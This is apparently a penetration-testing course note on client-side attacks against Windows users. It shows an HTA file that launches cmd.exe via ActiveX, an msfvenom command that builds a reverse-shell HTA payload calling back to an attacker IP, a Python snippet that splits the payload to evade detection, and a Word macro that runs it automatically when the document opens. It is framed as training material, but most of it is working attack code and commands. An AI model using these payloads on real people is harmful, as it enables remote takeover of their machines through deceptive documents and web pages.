Module 13 (Clint Side Attacks)
Last updated
Last updated
Passive Enumeration:
Identify the victim's browser.
Active Enumeration:
Social Engineering:
Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.
Tool: fingerprintjs2
A JavaScript library to uniquely identify a browser based on its features.
HTA Attack:
Create an HTA (HTML Application) to execute malicious scripts.
Example HTA file (file.hta
):
Copy the HTA file to a web server:
Generate an HTA payload with msfvenom:
Word Macro:
Split the payload to evade detection.
str="" # payload from msfvenom
n=50
for i in range(0,len(str),n):
print "str = Str +" + '"' + str[i:i+n] + '"'
Add the split payload to a Word Macro (document.docm
).
Copy
Sub AutoOpen()
test1
End Sub
Sub Doc_Open()
test1
End Sub
Sub test1()
Dim Str As String
' Add the splitted payload here
CreateObject("Wscript.shell").Run Str
End Sub
Object Linking and Embedding (OLE):
Create an evil batch file (evil.bat
).
Create a link object in the Word document (document.docm
).
Resources:
<!DOCTYPE html>
<html>
<head>
<script>
var x='cmd.exe'
new ActiveXObject('WScript.shell').Run(x);
</script>
</head>
<body>
<script> self.close() </script>
</body>
</html>
sudo cp file.hta /var/www/html/file2.hta
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta